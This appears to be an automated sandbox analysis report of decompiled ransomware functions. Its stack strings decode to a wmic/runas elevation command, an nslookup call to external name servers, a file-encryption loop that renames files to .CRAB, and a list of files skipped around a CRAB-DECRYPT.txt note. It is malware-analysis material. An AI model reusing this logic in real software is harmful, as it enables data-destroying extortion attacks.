				intOrPtr _v1592;
				intOrPtr _v1596;
				intOrPtr _v1600;
				intOrPtr _v1604;
				intOrPtr _v1608;
				intOrPtr _v1612;
				intOrPtr _v1616;
				short _v1620;
				intOrPtr _v1624;
				intOrPtr _v1628;
				intOrPtr _v1632;
				intOrPtr _v1636;
				intOrPtr _v1640;
				intOrPtr _v1644;
				intOrPtr _v1648;
				intOrPtr _v1652;
				intOrPtr _v1656;
				intOrPtr _v1660;
				intOrPtr _v1664;
				intOrPtr _v1668;
				intOrPtr _v1672;
				short _v1676;
				char _v1680;
				int _t54;
				struct HWND__* _t62;
				long _t66;
				void* _t76;
				void* _t78;
				void* _t80;

				_t78 = __ecx;
				_t54 = E0F583CF0(__edx);
				if(_t54 != 0) {
					_t54 = E0F583C70();
					if(_t54 == 0) {
						_v1676 = 0x770025;
						_v1672 = 0x6e0069;
						_v1668 = 0x690064;
						_v1664 = 0x250072;
						_v1660 = 0x73005c;
						_v1656 = 0x730079;
						_v1652 = 0x650074;
						_v1648 = 0x33006d;
						_v1644 = 0x5c0032;
						_v1640 = 0x620077;
						_v1636 = 0x6d0065;
						_v1632 = 0x77005c;
						_v1628 = 0x69006d;
						_v1624 = 0x63;
						ExpandEnvironmentStringsW( &_v1676,  &_v1540, 0xff);
						_v1620 = 0x720070;
						_v1616 = 0x63006f;
						_v1612 = 0x730065;
						_v1608 = 0x200073;
						_v1604 = 0x610063;
						_v1600 = 0x6c006c;
						_v1596 = 0x630020;
						_v1592 = 0x650072;
						_v1588 = 0x740061;
						_v1584 = 0x200065;
						_v1580 = 0x630022;
						_v1576 = 0x64006d;
						_v1572 = 0x2f0020;
						_v1568 = 0x200063;
						_v1564 = 0x740073;
						_v1560 = 0x720061;
						_v1556 = 0x200074;
						_v1552 = 0x730025;
						_v1548 = 0x22;
						wsprintfW( &_v1028,  &_v1620, _t78);
						_t76 = VirtualAlloc(0, 0x3d, 0x3000, 0x40);
						 *_t76 = 0x3c;
						 *(_t76 + 4) = 0x40;
						_t62 = GetForegroundWindow();
						_t80 = 0;
						 *(_t76 + 8) = _t62;
						_v1680 = 0x750072;
						_v1676 = 0x61006e;
						_v1672 = 0x73;
						 *((intOrPtr*)(_t76 + 0xc)) =  &_v1680;
						 *((intOrPtr*)(_t76 + 0x10)) =  &_v1532;
						 *((intOrPtr*)(_t76 + 0x14)) =  &_v1020;
						 *(_t76 + 0x18) = 0;
						 *(_t76 + 0x1c) = 0;
						 *(_t76 + 0x20) = 0;
						while(1) {
							_t66 = ShellExecuteExW(_t76);
							if(_t66 != 0) {
								break;
							}
							_t80 = _t80 + 1;
							if(_t80 < 0x64) {
								continue;
							}
							_t54 = VirtualFree(_t76, _t66, 0x8000);
							goto L6;
						}
						WaitForSingleObject( *(_t76 + 0x38), 0xffffffff);
						CloseHandle( *(_t76 + 0x38));
						ExitProcess(0);
					}
				}
				L6:
				return _t54;
			}

0x0f583dbf
0x0f583dc1
0x0f583dc8
0x0f583dce
0x0f583dd5
0x0f583de7
0x0f583df4
0x0f583dfd
0x0f583e05
0x0f583e0d
0x0f583e15
0x0f583e1d
0x0f583e25
0x0f583e2d
0x0f583e35
0x0f583e3d
0x0f583e45
0x0f583e4d
0x0f583e55
0x0f583e5d
0x0f583e68
0x0f583e78
0x0f583e81
0x0f583e89
0x0f583e91
0x0f583e99
0x0f583ea1
0x0f583ea9
0x0f583eb1
0x0f583eb9
0x0f583ec4
0x0f583ecf
0x0f583eda
0x0f583ee5
0x0f583ef0
0x0f583efb
0x0f583f06
0x0f583f11
0x0f583f1c
0x0f583f27
0x0f583f41
0x0f583f43
0x0f583f49
0x0f583f50
0x0f583f5c
0x0f583f5e
0x0f583f65
0x0f583f6d
0x0f583f75
0x0f583f7d
0x0f583f87
0x0f583f91
0x0f583f94
0x0f583f9b
0x0f583fa2
0x0f583fb0
0x0f583fb1
0x0f583fb5
0x00000000
0x00000000
0x0f583fb7
0x0f583fbb
0x00000000
0x00000000
0x0f583fc4
0x00000000
0x0f583fc4
0x0f583fd6
0x0f583fdf
0x0f583fe7
0x0f583fe7
0x0f583dd5
0x0f583fca
0x0f583fd0

APIs

Part of subcall function 0F583CF0: _memset.LIBCMT ref: 0F583D42
Part of subcall function 0F583CF0: VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000003), ref: 0F583D66
Part of subcall function 0F583CF0: VerSetConditionMask.KERNEL32(00000000), ref: 0F583D6A
Part of subcall function 0F583CF0: VerSetConditionMask.KERNEL32(00000000), ref: 0F583D6E
Part of subcall function 0F583CF0: VerifyVersionInfoW.KERNEL32 ref: 0F583D95

Part of subcall function 0F583C70: AllocateAndInitializeSid.ADVAPI32(00000000,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 0F583CA0

ExpandEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0F583E5D
wsprintfW.USER32 ref: 0F583F27
VirtualAlloc.KERNEL32(00000000,0000003D,00003000,00000040), ref: 0F583F3B
GetForegroundWindow.USER32 ref: 0F583F50
ShellExecuteExW.SHELL32(00000000), ref: 0F583FB1
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F583FC4
WaitForSingleObject.KERNEL32(?,000000FF), ref: 0F583FD6
CloseHandle.KERNEL32(?), ref: 0F583FDF
ExitProcess.KERNEL32 ref: 0F583FE7

Strings

t, xrefs: 0F583E1D
a, xrefs: 0F583EFB
r, xrefs: 0F583F65
%, xrefs: 0F583DE7
d, xrefs: 0F583DFD
\, xrefs: 0F583E0D
c, xrefs: 0F583E91
, xrefs: 0F583EDA
r, xrefs: 0F583E05
m, xrefs: 0F583ECF
, xrefs: 0F583EA1
i, xrefs: 0F583DF4
l, xrefs: 0F583E99
c, xrefs: 0F583E55
e, xrefs: 0F583E3D
", xrefs: 0F583EC4
p, xrefs: 0F583E68
n, xrefs: 0F583F6D
t, xrefs: 0F583F06
%, xrefs: 0F583F11
y, xrefs: 0F583E15
", xrefs: 0F583F1C
2, xrefs: 0F583E2D
w, xrefs: 0F583E35
s, xrefs: 0F583E89
o, xrefs: 0F583E78
e, xrefs: 0F583E81
m, xrefs: 0F583E25
r, xrefs: 0F583EA9
a, xrefs: 0F583EB1
s, xrefs: 0F583F75
c, xrefs: 0F583EE5
s, xrefs: 0F583EF0
\, xrefs: 0F583E45
e, xrefs: 0F583EB9

Memory Dump Source

Source File: 00000003.00000002.298114083.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true

Associated: 00000003.00000002.298101480.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.298127638.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.298139854.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.298147707.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_f580000_mqsmvj.jbxd

Yara matches

Similarity

API ID: ConditionMask$Virtual$AllocAllocateCloseEnvironmentExecuteExitExpandForegroundFreeHandleInfoInitializeObjectProcessShellSingleStringsVerifyVersionWaitWindow_memsetwsprintf
String ID: $ $"$"$%$%$2$\$\$a$a$c$c$c$d$e$e$e$i$l$m$m$n$o$p$r$r$r$s$s$s$t$t$w$y
API String ID: 561366689-3790645798
Opcode ID: 2d5441cc97f182e21739141cf843ecc5097a49877d9c44bad480227ee9ac69d9
Instruction ID: f084ac1c31428ad25061de51693550b6d875a6523ef945250586e709d6c8e080
Opcode Fuzzy Hash: 2d5441cc97f182e21739141cf843ecc5097a49877d9c44bad480227ee9ac69d9
Instruction Fuzzy Hash: DD5157B0008341EFE3208F10C548B9ABFF9BF84759F004A2DE6989A251D7FA915DCF92

Uniqueness

Uniqueness Score: -1.00%

Function 0F5837B0 Relevance: 66.8, APIs: 32, Strings: 6, Instructions: 320
memorystringwindowCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E0F5837B0(WCHAR* __ecx, void* __edx, void* __eflags) {
				long _v8;
				void* _v12;
				long _v16;
				long _v20;
				void* _v24;
				void* _v28;
				long _v32;
				long _v36;
				void _v40;
				void _v44;
				signed int _v48;
				WCHAR* _v52;
				WCHAR* _v56;
				void* _v60;
				void* _v64;
				void* _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				short _v80;
				int _v84;
				char _v88;
				char _v104;
				char _v108;
				char _v140;
				char _v388;
				void* _t96;
				void* _t97;
				struct HWND__* _t99;
				void* _t101;
				void* _t107;
				long _t124;
				long _t125;
				long _t128;
				WCHAR* _t145;
				void* _t147;
				void* _t149;
				void* _t151;
				WCHAR* _t162;
				void* _t163;
				void* _t164;
				void _t165;
				void* _t166;
				long _t168;
				void* _t173;
				void* _t175;
				void* _t176;
				void* _t177;

				_t145 = __ecx;
				_t166 = __edx;
				_v52 = __ecx;
				SetFileAttributesW(_t145, GetFileAttributesW(__ecx) & 0xfffffffe);
				_v20 = 0;
				_v32 = 0;
				_t151 = _t166;
				E0F586500(_t151, 0, 0,  &_v20,  &_v32);
				_t162 = VirtualAlloc(0, 0x401, 0x3000, 0x40);
				_v80 = 0x43002e;
				_v56 = _t162;
				_v76 = 0x410052;
				_v72 = 0x42;
				lstrcpyW(_t162, _t145);
				lstrcatW(_t162,  &_v80);
				asm("movdqa xmm0, [0xf590530]");
				asm("movdqu [ebp-0x88], xmm0");
				_push(_t151);
				asm("movdqa xmm0, [0xf590530]");
				asm("movdqu [ebp-0x78], xmm0");
				_v108 = 0;
				asm("movdqa xmm0, [0xf590530]");
				asm("movdqu [ebp-0x64], xmm0");
				E0F588400( &_v104, 0x10);
				E0F588400( &_v140, 0x20);
				_t96 = VirtualAlloc(0, 0x800, 0x3000, 4);
				asm("movdqu xmm0, [ebp-0x88]");
				asm("movdqu [ebx], xmm0");
				asm("movdqu xmm0, [ebp-0x78]");
				_v24 = _t96;
				asm("movdqu [ebx+0x10], xmm0");
				_t97 = VirtualAlloc(0, 0x800, 0x3000, 4);
				asm("movdqu xmm0, [ebp-0x64]");
				_t163 = _t97;
				_v60 = _t163;
				asm("movdqu [edi], xmm0");
				_v88 = 0x20;
				_v84 = 0x10;
				_t99 = E0F586660(_v20, _v32, _t96,  &_v88, 0x800);
				_t175 = _t173 + 0x18;
				if(_t99 != 0) {
					_t101 = E0F586660(_v20, _v32, _t163,  &_v84, 0x800);
					_t176 = _t175 + 0x14;
					if(_t101 != 0) {
						E0F588520( &_v140,  &_v388);
						_t177 = _t176 + 8;
						_t147 = CreateFileW(_v52, 0xc0000000, 1, 0, 3, 0x80, 0);
						_v28 = _t147;
						if(_t147 != 0xffffffff) {
							_t164 = VirtualAlloc(0, 8, 0x3000, 4);
							 *_t164 = 0;
							 *(_t164 + 4) = 0;
							_t107 = VirtualAlloc(0, 0x100001, 0x3000, 4);
							_t168 = 0;
							_v12 = _t107;
							_v36 = 0;
							while(ReadFile(_t147, _t107, 0x100000,  &_v8, 0) != 0) {
								_t124 = _v8;
								if(_t124 != 0) {
									_t149 = 0;
									_v64 = 0;
									_t168 =  <  ? 1 : _t168;
									 *_t164 =  *_t164 + _t124;
									asm("adc [edi+0x4], ebx");
									_t125 = _v8;
									_v48 = _t125;
									if((_t125 & 0x0000000f) != 0) {
										do {
											_t125 = _t125 + 1;
										} while ((_t125 & 0x0000000f) != 0);
										_v8 = _t125;
									}
									_v68 = VirtualAlloc(0, _t125, 0x3000, 4);
									E0F588B20(_t126, _v12, _v48);
									_t128 = _v8;
									_t177 = _t177 + 0xc;
									_v40 = _t128;
									if(VirtualAlloc(0, _t128, 0x3000, 4) != 0) {
										E0F5836D0(_v68, _v40,  &_v64,  &_v388,  &_v104, _t129);
										_t149 = _v64;
										_t177 = _t177 + 0x10;
									}
									VirtualFree(_v68, 0, 0x8000);
									SetFilePointer(_v28,  ~_v48, 0, 1);
									if(WriteFile(_v28, _t149, _v8,  &_v16, 0) == 0) {
										_t168 = 1;
										_v36 = 1;
									}
									VirtualFree(_t149, 0, 0x8000);
									_t147 = _v28;
									if(_t168 == 0) {
										_t107 = _v12;
										continue;
									}
								}
								break;
							}
							VirtualFree(_v12, 0, 0x8000);
							if(_v36 == 0) {
								WriteFile(_t147, _v24, 0x100,  &_v16, 0);
								WriteFile(_t147, _v60, 0x100,  &_v16, 0);
								WriteFile(_t147, _t164, 0x10,  &_v16, 0);
							}
							CloseHandle(_t147);
							_v40 =  *_t164;
							VirtualFree(_t164, 0, 0x8000);
							VirtualFree(_v24, 0, 0x8000);
							VirtualFree(_v60, 0, 0x8000);
							if(_v36 == 0) {
								MoveFileW(_v52, _v56);
							}
							_t165 = _v40;
						} else {
							VirtualFree(_t163, 0, 0x8000);
							VirtualFree(_v24, 0, 0x8000);
							asm("xorps xmm0, xmm0");
							asm("movlpd [ebp-0x28], xmm0");
							_t165 = _v44;
						}
					} else {
						GetLastError();
						asm("xorps xmm0, xmm0");
						asm("movlpd [ebp-0x28], xmm0");
						_t165 = _v44;
					}
				} else {
					MessageBoxA(_t99, "Fatal error: rsaenh.dll is not initialized as well", "Fatal error", 0x10);
					asm("xorps xmm0, xmm0");
					asm("movlpd [ebp-0x28], xmm0");
					_t165 = _v44;
				}
				VirtualFree(_v56, 0, 0x8000);
				return _t165;
			}

0x0f5837bb
0x0f5837bd
0x0f5837c1
0x0f5837cf
0x0f5837d8
0x0f5837e3
0x0f5837ef
0x0f5837f1
0x0f58380c
0x0f58380e
0x0f583817
0x0f58381a
0x0f583821
0x0f583828
0x0f583833
0x0f583839
0x0f583846
0x0f58384e
0x0f58384f
0x0f58385a
0x0f58385f
0x0f583863
0x0f58386b
0x0f583870
0x0f583880
0x0f583896
0x0f583898
0x0f5838ae
0x0f5838b4
0x0f5838b9
0x0f5838bc
0x0f5838c1
0x0f5838c3
0x0f5838c8
0x0f5838d3
0x0f5838d6
0x0f5838da
0x0f5838e1
0x0f5838ef
0x0f5838f4
0x0f5838f9
0x0f583937
0x0f58393c
0x0f583941
0x0f583970
0x0f583975
0x0f583993
0x0f583995
0x0f58399b
0x0f5839db
0x0f5839e9
0x0f5839ef
0x0f5839f6
0x0f5839f8
0x0f5839fa
0x0f5839fd
0x0f583a05
0x0f583a20
0x0f583a25
0x0f583a2b
0x0f583a37
0x0f583a3a
0x0f583a3d
0x0f583a3f
0x0f583a42
0x0f583a45
0x0f583a4a
0x0f583a50
0x0f583a50
0x0f583a51
0x0f583a55
0x0f583a55
0x0f583a6b
0x0f583a72
0x0f583a77
0x0f583a7a
0x0f583a7d
0x0f583a92
0x0f583aaa
0x0f583aaf
0x0f583ab2
0x0f583ab2
0x0f583abf
0x0f583ad2
0x0f583aed
0x0f583aef
0x0f583af4
0x0f583af4
0x0f583aff
0x0f583b05
0x0f583b0a
0x0f583a02
0x00000000
0x0f583a02
0x0f583b0a
0x00000000
0x0f583a25
0x0f583b20
0x0f583b26
0x0f583b37
0x0f583b4c
0x0f583b5c
0x0f583b5c
0x0f583b63
0x0f583b76
0x0f583b79
0x0f583b85
0x0f583b91
0x0f583b97
0x0f583b9f
0x0f583b9f
0x0f583ba5
0x0f58399d
0x0f5839ab
0x0f5839b7
0x0f5839b9
0x0f5839bc
0x0f5839c4
0x0f5839c4
0x0f583943
0x0f583943
0x0f58394f
0x0f583952
0x0f58395a
0x0f58395a
0x0f5838fb
0x0f583908
0x0f583914
0x0f583917
0x0f58391f
0x0f58391f
0x0f583bb2
0x0f583bbe

APIs

GetFileAttributesW.KERNEL32(00000000,00000010,00000000,00000000), ref: 0F5837C4
SetFileAttributesW.KERNEL32(00000000,00000000), ref: 0F5837CF
VirtualAlloc.KERNEL32(00000000,00000401,00003000,00000040,00000000,00000000,00000000,?), ref: 0F58380A
lstrcpyW.KERNEL32 ref: 0F583828
lstrcatW.KERNEL32 ref: 0F583833

Part of subcall function 0F588400: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000,00000000,772966A0,00000000), ref: 0F588420
Part of subcall function 0F588400: VirtualAlloc.KERNEL32(00000000,00000011,00003000,00000040), ref: 0F588448
Part of subcall function 0F588400: GetModuleHandleA.KERNEL32(?), ref: 0F58849D
Part of subcall function 0F588400: LoadLibraryA.KERNEL32(Advapi32.dll), ref: 0F5884AB
Part of subcall function 0F588400: GetProcAddress.KERNEL32(00000000,CryptGenRandomAdvapi32.dll), ref: 0F5884BA
Part of subcall function 0F588400: CryptReleaseContext.ADVAPI32(?,00000000), ref: 0F5884DE
Part of subcall function 0F588400: VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F5884EC

Part of subcall function 0F588400: CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,0F583875), ref: 0F588500
Part of subcall function 0F588400: VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?,?,0F583875), ref: 0F58850E

VirtualAlloc.KERNEL32(00000000,00000800,00003000,00000004), ref: 0F583896
VirtualAlloc.KERNEL32(00000000,00000800,00003000,00000004), ref: 0F5838C1

Part of subcall function 0F586660: EnterCriticalSection.KERNEL32(0F592A48,?,0F5838F4,00000000,00000000,00000000,?,00000800), ref: 0F58666B
Part of subcall function 0F586660: CryptAcquireContextW.ADVAPI32(00000000,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,F0000000,?,0F5838F4,00000000,00000000,00000000), ref: 0F586691
Part of subcall function 0F586660: GetLastError.KERNEL32(?,0F5838F4,00000000,00000000,00000000), ref: 0F58669B
Part of subcall function 0F586660: CryptAcquireContextW.ADVAPI32(00000000,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008,?,0F5838F4,00000000,00000000,00000000), ref: 0F5866B7

MessageBoxA.USER32 ref: 0F583908
GetLastError.KERNEL32 ref: 0F583943
VirtualFree.KERNEL32(?,00000000,00008000), ref: 0F583BB2

Strings

B, xrefs: 0F583821
R, xrefs: 0F58381A
., xrefs: 0F58380E
Fatal error: rsaenh.dll is not initialized as well, xrefs: 0F583902
, xrefs: 0F5838DA
Fatal error, xrefs: 0F5838FD

Memory Dump Source

Source File: 00000003.00000002.298114083.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true

Associated: 00000003.00000002.298101480.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.298127638.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.298139854.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.298147707.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_f580000_mqsmvj.jbxd

Yara matches

Similarity

API ID: Virtual$ContextCrypt$Alloc$AcquireFree$AttributesErrorFileLastRelease$AddressCriticalEnterHandleLibraryLoadMessageModuleProcSectionlstrcatlstrcpy
String ID: $.$B$Fatal error$Fatal error: rsaenh.dll is not initialized as well$R
API String ID: 1177701972-4284454829
Opcode ID: ba6937b02cddb702b8e43c5499a0e281d256206ee54e1dec388b3160e899bcb7
Instruction ID: 8d669c6e364cd0e23f50fca449ac9c40ddfebeebdc1466eaf58607987c92b789
Opcode Fuzzy Hash: ba6937b02cddb702b8e43c5499a0e281d256206ee54e1dec388b3160e899bcb7
Instruction Fuzzy Hash: 49C19F71E40309BBEB119BA4DD81FEEBBB8FF48711F204125F640BA2C1DBB469568B54

Uniqueness

Uniqueness Score: -1.00%

Function 0F585060 Relevance: 61.4, APIs: 8, Strings: 27, Instructions: 118
pipememoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0F585060(CHAR* __ecx, void* __edx, WCHAR* _a4) {
				struct _SECURITY_ATTRIBUTES _v16;
				short _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				char _v72;
				short _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				char _v128;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t43;
				void* _t55;
				CHAR* _t62;
				void* _t64;

				_v72 = 0x73006e;
				_t55 = __edx;
				_v20 = 0;
				_t62 = __ecx;
				_v76 = 0;
				_v68 = 0x6f006c;
				_t41 =  !=  ?  &_v128 :  &_v72;
				_v64 = 0x6b006f;
				_a4 =  !=  ?  &_v128 :  &_v72;
				_v60 = 0x700075;
				_v56 = 0x250020;
				_v52 = 0x200053;
				_v48 = 0x73006e;
				_v44 = 0x2e0031;
				_v40 = 0x690076;
				_v36 = 0x6d0072;
				_v32 = 0x630061;
				_v28 = 0x2e0068;
				_v24 = 0x750072;
				_v128 = 0x73006e;
				_v124 = 0x6f006c;
				_v120 = 0x6b006f;
				_v116 = 0x700075;
				_v112 = 0x250020;
				_v108 = 0x200053;
				_v104 = 0x73006e;
				_v100 = 0x2e0032;
				_v96 = 0x690076;
				_v92 = 0x6d0072;
				_v88 = 0x630061;
				_v84 = 0x2e0068;
				_v80 = 0x750072;
				_v16.nLength = 0xc;
				_v16.bInheritHandle = 1;
				_v16.lpSecurityDescriptor = 0;
				_t43 = CreatePipe(0xf592a70, 0xf592a6c,  &_v16, 0);
				if(_t43 != 0) {
					_t43 = SetHandleInformation( *0xf592a70, 1, 0);
					if(_t43 == 0) {
						goto L1;
					} else {
						CreatePipe(0xf592a68, 0xf592a74,  &_v16, 0);
						_t43 = SetHandleInformation( *0xf592a74, 1, 0);
						if(_t43 == 0) {
							goto L1;
						} else {
							_t64 = VirtualAlloc(0, 0x2800, 0x3000, 4);
							if(_t64 == 0) {
								lstrcpyA(_t62, "fabian wosar <3");
								return 0;
							} else {
								wsprintfW(_t64, _a4, _t55);
								E0F584E10(_t64);
								E0F584FB0(_t55, _t62, _t55, _t62, _t64);
								VirtualFree(_t64, 0, 0x8000);
								return 0;
							}
						}
					}
				} else {
					L1:
					return _t43 | 0xffffffff;
				}
			}

0x0f58506d
0x0f585078
0x0f58507b
0x0f58507f
0x0f585081
0x0f58508b
0x0f585092
0x0f585095
0x0f58509e
0x0f5850af
0x0f5850b6
0x0f5850bd
0x0f5850c4
0x0f5850cb
0x0f5850d2
0x0f5850d9
0x0f5850e0
0x0f5850e7
0x0f5850ee
0x0f5850f5
0x0f5850fc
0x0f585103
0x0f58510a
0x0f585111
0x0f585118
0x0f58511f
0x0f585126
0x0f58512d
0x0f585134
0x0f58513b
0x0f585142
0x0f585149
0x0f585150
0x0f585157
0x0f58515e
0x0f585165
0x0f58516d
0x0f585189
0x0f58518d
0x00000000
0x0f58518f
0x0f58519f
0x0f5851af
0x0f5851b3
0x00000000
0x0f5851b5
0x0f5851c9
0x0f5851cd
0x0f58520a
0x0f585218
0x0f5851cf
0x0f5851d4
0x0f5851df
0x0f5851e8
0x0f5851f5
0x0f585203
0x0f585203
0x0f5851cd
0x0f5851b3
0x0f58516f
0x0f58516f
0x0f585178
0x0f585178

APIs

CreatePipe.KERNEL32(0F592A70,0F592A6C,?,00000000,00000001,00000001,00000000), ref: 0F585165
SetHandleInformation.KERNEL32(00000001,00000000), ref: 0F585189
CreatePipe.KERNEL32(0F592A68,0F592A74,0000000C,00000000), ref: 0F58519F
SetHandleInformation.KERNEL32(00000001,00000000), ref: 0F5851AF
VirtualAlloc.KERNEL32(00000000,00002800,00003000,00000004), ref: 0F5851C3
wsprintfW.USER32 ref: 0F5851D4
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F5851F5

Strings

n, xrefs: 0F58506D
n, xrefs: 0F58511F
2, xrefs: 0F585126
u, xrefs: 0F5850AF
h, xrefs: 0F585142
S, xrefs: 0F5850BD
l, xrefs: 0F58508B
n, xrefs: 0F5850F5
o, xrefs: 0F585103
h, xrefs: 0F5850E7
u, xrefs: 0F58510A
, xrefs: 0F5850B6
r, xrefs: 0F5850D9
, xrefs: 0F585111
v, xrefs: 0F58512D
a, xrefs: 0F5850E0
v, xrefs: 0F5850D2
1, xrefs: 0F5850CB
a, xrefs: 0F58513B
o, xrefs: 0F585095
fabian wosar <3, xrefs: 0F585204
l, xrefs: 0F5850FC
r, xrefs: 0F585134
S, xrefs: 0F585118
r, xrefs: 0F5850EE
r, xrefs: 0F585149
n, xrefs: 0F5850C4

Memory Dump Source

Source File: 00000003.00000002.298114083.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true

Associated: 00000003.00000002.298101480.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.298127638.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.298139854.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.298147707.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_f580000_mqsmvj.jbxd

Yara matches

Similarity

API ID: CreateHandleInformationPipeVirtual$AllocFreewsprintf
String ID: $ $1$2$S$S$a$a$fabian wosar <3$h$h$l$l$n$n$n$n$o$o$r$r$r$r$u$u$v$v
API String ID: 1490407255-3072057902
Opcode ID: 315b0cbed8d65d982c82a46fd35c39bbff48465a2df2d78d32241635c60fe22e
Instruction ID: 8da1a7b584a6d7daf77cc5e32a920ffe955128b43e4ad9c8c8c528cfe2bfa8c4
Opcode Fuzzy Hash: 315b0cbed8d65d982c82a46fd35c39bbff48465a2df2d78d32241635c60fe22e
Instruction Fuzzy Hash: A2415C71E40308ABEB109F94DD487EDBFB6FB04759F104129E904BA281D7FA455A8F94

Uniqueness

Uniqueness Score: -1.00%

Function 0F5868F0 Relevance: 31.6, APIs: 11, Strings: 10, Instructions: 78
stringCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E0F5868F0(WCHAR* __ecx) {
				int _t4;
				signed int _t5;
				signed int _t15;
				void* _t19;
				WCHAR* _t21;
				short* _t25;
				WCHAR* _t26;

				_t21 = __ecx;
				_t4 = lstrlenW(__ecx);
				_t5 = lstrlenW(_t21);
				_t1 = _t21 - 2; // -2
				_t25 = _t1 + _t5 * 2;
				_t19 = _t4 - 1;
				if(_t19 != 0) {
					do {
						_t25 = _t25 - 2;
						_t19 = _t19 - 1;
					} while ( *_t25 != 0x5c && _t19 != 0);
				}
				_t26 = _t25 + 2;
				if(lstrcmpiW(_t26, L"desktop.ini") != 0) {
					if(lstrcmpiW(_t26, L"autorun.inf") == 0 || lstrcmpiW(_t26, L"ntuser.dat") == 0 || lstrcmpiW(_t26, L"iconcache.db") == 0 || lstrcmpiW(_t26, L"bootsect.bak") == 0 || lstrcmpiW(_t26, L"boot.ini") == 0 || lstrcmpiW(_t26, L"ntuser.dat.log") == 0 || lstrcmpiW(_t26, L"thumbs.db") == 0) {
						goto L5;
					} else {
						_t15 = lstrcmpiW(_t26, L"CRAB-DECRYPT.txt");
						asm("sbb eax, eax");
						return  ~_t15 + 1;
					}
				} else {
					L5:
					return 1;
				}
			}

0x0f5868f9
0x0f5868fc
0x0f586901
0x0f586903
0x0f586906
0x0f586909
0x0f58690a
0x0f586910
0x0f586910
0x0f586913
0x0f586914
0x0f586910
0x0f586924
0x0f586931
0x0f586946
0x00000000
0x0f586990
0x0f586996
0x0f58699b
0x0f5869a0
0x0f5869a0
0x0f586935
0x0f586935
0x0f58693b
0x0f58693b

APIs

lstrlenW.KERNEL32(00000000,00000010,00000000,00000000,0F586B03), ref: 0F5868FC
lstrlenW.KERNEL32(00000000), ref: 0F586901
lstrcmpiW.KERNEL32(-00000004,desktop.ini), ref: 0F58692D
lstrcmpiW.KERNEL32(-00000004,autorun.inf), ref: 0F586942
lstrcmpiW.KERNEL32(-00000004,ntuser.dat), ref: 0F58694E
lstrcmpiW.KERNEL32(-00000004,iconcache.db), ref: 0F58695A
lstrcmpiW.KERNEL32(-00000004,bootsect.bak), ref: 0F586966
lstrcmpiW.KERNEL32(-00000004,boot.ini), ref: 0F586972
lstrcmpiW.KERNEL32(-00000004,ntuser.dat.log), ref: 0F58697E
lstrcmpiW.KERNEL32(-00000004,thumbs.db), ref: 0F58698A
lstrcmpiW.KERNEL32(-00000004,CRAB-DECRYPT.txt), ref: 0F586996

Strings

CRAB-DECRYPT.txt, xrefs: 0F586990
desktop.ini, xrefs: 0F586927
ntuser.dat, xrefs: 0F586948
bootsect.bak, xrefs: 0F586960
iconcache.db, xrefs: 0F586954
i)w, xrefs: 0F58691E
ntuser.dat.log, xrefs: 0F586978
thumbs.db, xrefs: 0F586984
boot.ini, xrefs: 0F58696C
autorun.inf, xrefs: 0F58693C

Memory Dump Source

Source File: 00000003.00000002.298114083.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true

Associated: 00000003.00000002.298101480.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.298127638.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.298139854.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.298147707.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_f580000_mqsmvj.jbxd

Yara matches

Similarity

API ID: lstrcmpi$lstrlen
